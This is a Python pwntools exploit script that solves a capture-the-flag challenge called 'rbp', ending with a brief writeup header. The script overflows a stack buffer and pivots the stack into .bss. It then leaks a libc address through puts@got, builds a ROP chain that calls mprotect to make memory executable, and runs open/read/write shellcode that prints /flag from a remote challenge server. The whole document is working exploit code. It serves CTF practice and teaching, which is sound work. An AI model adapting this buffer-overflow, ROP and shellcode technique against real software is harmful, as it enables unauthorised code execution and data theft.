from pwn import *
# Short aliases over the global `io` tube (bound further down the script).
# Each helper looks `io` up at call time, so they follow whichever tube is
# current when they are called.
def s(data):
    """Send `data` on the current tube."""
    return io.send(data)


def sa(delim, data):
    """Wait for `delim` (stringified) on the tube, then send `data`."""
    return io.sendafter(str(delim), data)


def sl(data):
    """Send `data` followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait for `delim` (stringified), then send `data` plus a newline."""
    return io.sendlineafter(str(delim), data)


def r(num):
    """Receive up to `num` bytes from the tube."""
    return io.recv(num)


def ru(delims, drop=True):
    """Receive up to `delims`; the delimiter itself is dropped unless drop=False."""
    return io.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the user (interactive mode)."""
    return io.interactive()


def uu32(data):
    """Right-pad `data` with NULs to 4 bytes and unpack it as a u32 (context endianness)."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Right-pad `data` with NULs to 8 bytes and unpack it as a u64 (context endianness)."""
    return u64(data.ljust(8, b'\x00'))


def ls(data):
    """Log `data` at pwntools' success level."""
    return log.success(data)
# pwntools context: 64-bit x86 for packing/assembly, debug logging (every
# byte sent and received is echoed, which is noisy but makes the writeup
# reproducible), and gdb windows opened as a tmux split.
context.update(
    arch='amd64',
    log_level='debug',
    terminal=['tmux', 'splitw', '-h', '-l', '130'],
)
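def start(binary, argv=None, *a, **kw):
    '''Start the target binary, under gdb when the script is run with GDB=1.

    binary: path of the executable to run.
    argv:   extra command-line arguments (default: none).  A None default
            replaces the shared mutable list default of the original.
    Remaining positional and keyword arguments are forwarded to gdb.debug /
    process.  Returns the pwntools tube.  Relies on the module-level
    `gdbscript` and on pwntools' command-line `args`.
    '''
    cmd = [binary] + (list(argv) if argv else [])
    if args.GDB:
        return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    return process(cmd, *a, **kw)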
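# gdb commands used by start() when the script is run with GDB=1.
# The breakpoint address carries a single "0x" prefix: gdb rejects the
# doubled form (`0x0x...`) as an invalid number, so the breakpoint would
# never be set.  .format() is a no-op while there are no placeholders.
gdbscript = '''
b *0x404410
continue
'''.format(**locals())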
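binary = './rbp'
libelf = '/opt/pwn/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6'
# Load the target and its libc only when a path is configured ('' disables).
if binary:
    elf = ELF(binary)
    rop = ROP(binary)
if libelf:
    libc = ELF(libelf)
# Open exactly one tube.  The original spawned a local process via start()
# and then immediately rebound `io` to the remote connection, leaving the
# local process running with no handle to it.  Run with LOCAL=1 (pwntools
# `args`; combine with GDB=1 to debug) to target the local binary instead.
if args.LOCAL:
    io = start(binary)
else:
    io = remote('node2.anna.nssctf.cn', 28681)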
# --- stage 1: set up the stack pivot ---------------------------------------
# Every address below is a fixed 0x40xxxx value, so the binary is evidently
# not PIE; nothing in the script leaks or preserves a stack canary, so
# presumably none is present either -- confirm with checksec.
bss = 0x404800      # writable address in the binary's data area, used as the new frame base
leave = 0x4012bf    # presumably a `leave ; ret` gadget in the binary -- confirm in the disassembly
# 0x210 bytes of filler reach the saved rbp (the same offset the later
# payloads pad to), then the new rbp (bss) and the return address 0x401292.
# The following stages rely on 0x401292 reading the next payload relative to
# rbp (presumably a re-entry into the vulnerable read) -- TODO confirm.
pay = b'A' *0x0210 + p64(bss) + p64(0x401292)
#gdb.attach(io)
s(pay)
pause()     # manual checkpoint, e.g. to attach a debugger before the next stage
# --- stage 2: leak a libc pointer by calling puts(puts@got) ----------------
# Chain layout:  pop rdi ; ret  <-  puts@got   (address to print)
#                puts via elf.sym (the binary's own PLT entry)
#                0x0401270        (back into the vulnerable routine for stage 3)
pay = p64(rop.find_gadget(['pop rdi','ret'])[0]) + p64(elf.got['puts']) + p64(elf.sym['puts']) +p64(0x0401270) # vuln
pay = pay.ljust(0x0210,b'A')
# Pivot: saved rbp = bss-0x218 and return into the leave gadget.  After that
# gadget's pop rbp, execution continues from bss-0x210, so the chain above
# must have been read to that address (rbp-0x210 of the stage-1 frame).
pay += p64(bss-0x218) + p64(leave)
s(pay)
# Discard output up to the bytes 0x40 0x0a that precede the leaked pointer
# (pwntools coerces the str to bytes).
ru('\x40\x0a')
# A user-space x86-64 pointer prints as 6 significant bytes; uu64 pads to 8.
x = uu64(r(6))
# The libc build is known (2.31-0ubuntu9.9), so one leaked pointer fixes the
# whole mapping.
libc_base = x - libc.sym['puts']
system = libc_base + libc.sym['system']                # computed but not used by the ORW chain below
bin_sh = libc_base + next(libc.search(b'/bin/sh'))    # computed but not used by the ORW chain below
ls(hex(libc_base))
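# libc copy used for the gadget search below.  This is the same file as
# `libelf`; the separate name is kept because the gadget code refers to it.
# (The original assigned this line twice in a row.)
libc_file = '/opt/pwn/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6'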
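# Gadgets are searched in the libc copy; offsets are rebased on libc_base.
libc_rop = ROP(libc_file)


def f(Str):
    '''Return the runtime address of the `<Str> ; ret` gadget in libc.

    Str: the single instruction preceding `ret`, e.g. 'pop rdi'.
    There is no fallback: if find_gadget reports no match, the subscript
    raises instead of returning a bogus address.
    '''
    return libc_base + libc_rop.find_gadget([Str,'ret'])[0]


syscall_ret = f('syscall')   # not used by the chain below
pop_rax = f('pop rax')       # not used by the chain below
pop_rdi = f('pop rdi')
pop_rsi = f('pop rsi')
pop_rbx = f('pop rbx')       # not used by the chain below
# pop rax ; pop rdx ; pop rbx ; ret -- hand-picked offset for this libc build.
# Assigned once: the original re-assigned this name three times (the first
# with a different offset), with only the last value taking effect.
pop_adb = libc_base + 0x000000000015f8c5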
# Open/read/write payload (no shell is spawned): open('/flag'), read 100
# bytes from the returned descriptor (rax) onto the stack, then write those
# 100 bytes to fd 1 (stdout), where io.interactive() shows them.
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('rax','rsp',100)
shellcode += shellcraft.write(1,'rsp',100)
shellcode = asm(shellcode)   # assembled for context.arch ('amd64')
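# Final chain: mprotect() the page that holds the pivoted stack to rwx, then
# return onto it.  Register setup with the gadgets resolved above:
#   rdi = bss-0x800 = 0x404000, the page-aligned start mprotect requires
#   rsi = 0x1000, one page
#   rax/rdx/rbx = 0/7/0 via pop_adb, i.e. rdx = PROT_READ|PROT_WRITE|PROT_EXEC
#   (rax and rbx are not consumed by the libc mprotect call)
orw_rop = flat(
    pop_rdi, bss-0x800,                    # rdi: address
    pop_rsi, 0x1000,                       # rsi: length
    pop_adb, 0,7,0,                        # rdx: permissions
    libc_base + libc.sym['mprotect'],      # change the page permissions
    # The stack is now rwx, so return straight onto it.  Assuming the chain
    # starts at 0x4043f8 (rbp 0x4043f0 + 8 after the final leave gadget), the
    # ten qwords above end at 0x404448, where the nop sled lands -- re-check
    # this value if the chain length or the pivot changes.
    0x404448,
    b'\x90'*0x20,                          # bytes literal: avoids pwntools' str->bytes coercion warning
    shellcode
)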
# --- stage 3: deliver the chain through the same overflow ------------------
pay = orw_rop
pay = pay.ljust(0x0210,b'B')
# Earlier pivot experiments, kept by the author for reference:
#x = bss - 0x404610
#exe = 0x4045f0-0x1f0
#pay += p64(bss-0x1f8) + p64(leave)
#pay += p64(bss-0x1f8) + p64(leave)
# Saved rbp = 0x4043f0 and return into the leave gadget: after the gadget's
# pop rbp, execution resumes at 0x4043f8, presumably the start of orw_rop
# (assuming the vulnerable read again placed the buffer at rbp-0x210).
pay += p64(0x4043f0) + p64(leave)
pause()     # manual checkpoint before the final stage
s(pay)
io.interactive()    # same as the itr() alias; the shellcode's output appears here
[NSSRound#14 Basic]rbp imLZH1的WriteUp
2023-08-06 07:37・By

imLZH1
栈迁移栈溢出ORWgadgetROPgadget